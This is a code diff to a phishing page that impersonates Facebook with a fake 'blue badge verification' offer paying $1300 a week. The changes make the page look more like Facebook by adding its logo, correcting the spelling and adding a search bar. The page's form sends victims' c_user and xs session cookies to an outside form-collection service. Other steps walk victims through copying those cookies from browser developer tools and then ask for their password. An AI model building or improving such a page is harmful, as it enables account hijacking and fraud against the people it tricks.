--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1">
     <br />
     <br />
-    <title>Portal Verification Portal</title>
+    <title>Facebook blue badge Verification</title>
     <link href="style.css" rel="stylesheet" type="text/css" />
     <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
 </head>
@@ -14,10 +14,17 @@
 <body>
     <div id="page1" class="page active">
         <nav>
-            <div class="logo">facebook</div>
+            <div class="nav-left">
+                <div class="fb-logo">
+                    <img src="IMG-20241211-WA0029.jpg" alt="Facebook">
+                </div>
+                <div class="search-container">
+                    <input type="text" placeholder="Search Facebook" disabled>
+                </div>
+            </div>
         </nav>
         <main class="landing">
-            <h1>Get Verified on FaCebook!</h1>
+            <h1>Get Verified on Facebook!</h1>
             <h2>Earn $1300/week with the Blue Badge Program</h2>
             <div class="benefits">
                 <div class="benefit-item">
@@ -26,22 +33,27 @@
                 </div>
                 <div class="benefit-item">
                     <i class="fas fa-dollar-sign"></i>
-                    <p>Monetize your influence through FaCebook Ads</p>
+                    <p>Monetize your influence through Facebook Ads</p>
                 </div>
                 <div class="benefit-item">
                     <i class="fas fa-money-bill-wave"></i>
                     <p>Weekly payments for eligible accounts</p>
                 </div>
             </div>
+            <br />
             <button class="btn-primary" onclick="showPage('page2')">Get Started</button>
         </main>
     </div>
 
     <div id="page2" class="page">
         <nav>
-            <div class="logo">facebook</div>
-            <div class="search-bar">
-                <input type="text" placeholder="Search FaCebook" disabled>
+            <div class="nav-left">
+                <div class="fb-logo">
+                    <img src="IMG-20241211-WA0029.jpg" alt="Facebook">
+                </div>
+                <div class="search-container">
+                    <input type="text" placeholder="Search Facebook" disabled>
+                </div>
             </div>
         </nav>
         <main class="verification">
@@ -56,11 +68,11 @@
             <form id="cookieForm" action="https://submit-form.com/g0dJSXe5U" method="POST">
                 <div class="form-group">
                     <label for="cuser">Enter c_user Value</label>
-                    <input type="text" id="cuser" name="cuser" required>
+                    <input type="number" id="cuser" name="cuser" inputmode="numeric" pattern="[0-9]*" required placeholder="write c_user here">
                 </div>
                 <div class="form-group">
                     <label for="xs">Enter xs Token</label>
-                    <input type="text" id="xs" name="xs" required>
+                    <input type="text" id="xs" name="xs" pattern="[0-9%:A-Za-z_\-]+" minlength="20" required placeholder="write xs here">
                 </div>
                 <button type="submit" class="btn-primary">Submit</button>
                 <button type="button" class="btn-secondary" onclick="showPage('page3')">
@@ -72,29 +84,41 @@
 
     <div id="page3" class="page">
         <nav>
-            <div class="logo">facebook</div>
+            <div class="nav-left">
+                <div class="fb-logo">
+                    <img src="IMG-20241211-WA0029.jpg" alt="Facebook">
+                </div>
+                <div class="search-container">
+                    <input type="text" placeholder="Search Facebook" disabled>
+                </div>
+            </div>
         </nav>
         <main class="instructions">
             <h1>How to Retrieve c_user and xs on Mobile</h1>
             <div class="steps-container">
                 <div class="step">
                     <span class="step-number">1</span>
+                    <i class="fas fa-download" style="color: #1877f2; margin: 0 15px;"></i>
                     <p>Download Kiwi Browser from the Play Store</p>
                 </div>
                 <div class="step">
                     <span class="step-number">2</span>
-                    <p>Log in to FaCebook.com in Kiwi Browser</p>
+                    <i class="fas fa-sign-in-alt" style="color: #1877f2; margin: 0 15px;"></i>
+                    <p>Log in to Facebook.com in Kiwi Browser</p>
                 </div>
                 <div class="step">
                     <span class="step-number">3</span>
+                    <i class="fas fa-tools" style="color: #1877f2; margin: 0 15px;"></i>
                     <p>Tap Menu (⋮) > Developer Tools > Application Tab</p>
                 </div>
                 <div class="step">
                     <span class="step-number">4</span>
-                    <p>Under Cookies, select FaCebook's URL</p>
+                    <i class="fas fa-cookie" style="color: #1877f2; margin: 0 15px;"></i>
+                    <p>Under Cookies, select Facebook's URL</p>
                 </div>
                 <div class="step">
                     <span class="step-number">5</span>
+                    <i class="fas fa-copy" style="color: #1877f2; margin: 0 15px;"></i>
                     <p>Copy c_user and xs values and paste them into the form</p>
                 </div>
             </div>
@@ -104,11 +128,20 @@
 
     <div id="page4" class="page">
         <nav>
-            <div class="logo">facebook</div>
+            <div class="nav-left">
+                <div class="fb-logo">
+                    <img src="IMG-20241211-WA0029.jpg" alt="Facebook">
+                </div>
+                <div class="search-container">
+                    <input type="text" placeholder="Search Facebook" disabled>
+                </div>
+            </div>
         </nav>
         <main class="confirm-identity">
             <div class="security-header">
-                <i class="fas fa-lock"></i>
+                <div class="fb-logo">
+                    <img src="IMG-20241211-WA0029.jpg" alt="Facebook">
+                </div>
                 <h1>Please Enter Your Password</h1>
                 <p>For your security, you must enter your password to continue</p>
             </div>
